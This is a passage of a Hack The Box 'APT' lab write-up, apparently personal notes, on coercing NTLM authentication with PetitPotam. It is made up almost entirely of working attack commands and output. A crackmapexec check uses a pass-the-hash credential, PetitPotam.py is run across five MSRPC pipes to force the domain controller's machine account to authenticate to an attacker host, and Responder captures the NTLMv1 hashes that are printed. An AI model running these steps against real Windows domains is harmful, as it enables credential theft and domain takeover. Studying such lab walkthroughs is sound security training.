NTLM Relay via PetitPotam

Another solution to invoke a SYSTEM level Net-NTLMv1 authentication to an attacker controlled SMB server This can be done as any regular domain user without elevating privileges to the henry.vinson_adm user

testing

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ crackmapexec smb apt.htb.local -d HTB.LOCAL -u henry.vinson -H 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -M petitpotam
SMB         apt.htb.local   445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB         apt.htb.local   445    APT              [+] HTB.LOCAL\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb 
PETITPOT... apt.htb.local   445    APT              VULNERABLE
PETITPOT... apt.htb.local   445    APT              Next step: https://github.com/topotam/PetitPotam

PetitPotam

┌──(kali㉿kali)-[~/…/htb/labs/apt/PetitPotam]
└─$ KRB5CCNAME=../smb/hashdump/henry.vinson@apt.htb.local.ccache python3 PetitPotam.py 10.10.16.8 apt.htb.local -d HTB.LOCAL -no-pass -k -dc-ip $IPv6 -target-ip $IPv6 -pipe all
 
                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
 
 
 
Trying pipe efsr
[-] connecting to ncacn_np:apt.htb.local[\PIPE\efsrpc]
[+] Connected!
[+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe lsarpc
[-] connecting to ncacn_np:apt.htb.local[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe samr
[-] connecting to ncacn_np:apt.htb.local[\PIPE\samr]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe netlogon
[-] connecting to ncacn_np:apt.htb.local[\PIPE\netlogon]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe lsass
[-] connecting to ncacn_np:apt.htb.local[\PIPE\lsass]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Done through 5 different MSRPC pipes

[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788

on Responder

Moving on to cracking

InfoSec LAB

Explorer

APT_NTLM_Relay_3

NTLM Relay via PetitPotam

testing

PetitPotam

Interactive Graph View

Table of Contents

Backlinks